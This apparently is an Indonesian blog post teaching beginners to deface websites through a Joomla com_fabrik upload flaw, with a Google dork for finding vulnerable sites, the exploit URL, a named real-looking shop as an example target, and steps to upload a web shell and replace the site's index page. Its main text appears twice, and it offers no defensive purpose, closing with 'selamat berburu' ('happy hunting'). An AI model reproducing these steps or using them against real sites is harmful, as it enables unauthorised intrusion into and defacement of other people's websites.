Untuk para master, dedengkot, mbahnya hacker khususnya defacer, pasti
sudah tidak asing lagi Exploit com_fabrik. Namun untuk newbie seperti
ane pasti masih clingak-clinguk. Maka dari itu ane mau berbagi sesuatu
bagi yang belom tau :)
Oke, untuk yang belum tahu disimak ya :)
Dork :
inurl:"index.php?option=com_fabrik"site:.uk (silahkan dikembangkan)
Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Langkah2nya :
Buka mbah google.com
Masukkan Dorknya tadi inurl:"inurl:"index.php?option=com_fabrik"site:.uk"
Pilih target. Misal kita mendapat http://www.case-stores.de/index.php?opti...mp;lang=de
Setelah menemukan target, ganti (explotasi) URLnya hingga menjadi http://www.case-stores.de/index.php?opti...1echercher
![[Image: 3_zps5c343d96.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tsjTNfsNRk4QJ3354h8Va48bTP16VeW_JP4tj0c3SXg-vAcz_sh2pEug26tLi948WoCqSn98Ygvfa0gMXRZ1BtIavhQsQL0BJ38lohiqh6XjDBX9xQuX5clMnvDgJtMLS5tQ1o_50=s0-d)
maka hasil nya seperti ini ,kalo tidak seperti ini mending cari yang lain :)
Upload shell ente Dan untuk melihat shell yang telah di upload, buka http://www.target.com/media/shell.php
![[Image: 4_zps8cde2690.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vAJjsLeggqMz1e526rnDZFMQaKTrR_jdMjvg-LLzJn_Wq8-Qi9lYQ_M1nNBLi7KAQc0iljAP_MqRK1BqkP7yInoCoYgJlQNGo6kBsF6FofNuSa1hO54tWfnGBRL5CK0hWPbobAzA=s0-d)
seperti ini ,sekarang kita udah masuk ke web tersebut tinggal ganti index nya :)
![[Image: 5_zpsfe8fbe56.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t8p_GRbdoK5JQG4Gr_xLh3AuDbOCG4Nou94V1p6WthhalcL77cS0iGzs9wNxjtp3eooBeKpLbApOSxOk9zhXPFbntvDfn9gVmmpPgCY46yMK6y4cgkSS3wJMOz2gas0UaBtuzaj7g=s0-d)
dan taraaaaaaaa berhasil :)
Mudah banget kan??? :)
Oke, selamat berburu....
Oke, untuk yang belum tahu disimak ya :)
Dork :
inurl:"index.php?option=com_fabrik"site:.uk (silahkan dikembangkan)
Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Langkah2nya :
Buka mbah google.com
Masukkan Dorknya tadi inurl:"inurl:"index.php?option=com_fabrik"site:.uk"
Pilih target. Misal kita mendapat http://www.case-stores.de/index.php?opti...mp;lang=de
Setelah menemukan target, ganti (explotasi) URLnya hingga menjadi http://www.case-stores.de/index.php?opti...1echercher
maka hasil nya seperti ini ,kalo tidak seperti ini mending cari yang lain :)
Upload shell ente Dan untuk melihat shell yang telah di upload, buka http://www.target.com/media/shell.php
seperti ini ,sekarang kita udah masuk ke web tersebut tinggal ganti index nya :)
dan taraaaaaaaa berhasil :)
Mudah banget kan??? :)
Oke, selamat berburu....
1 comments:
Tulis commentsthx ya atas informasi.a
Reply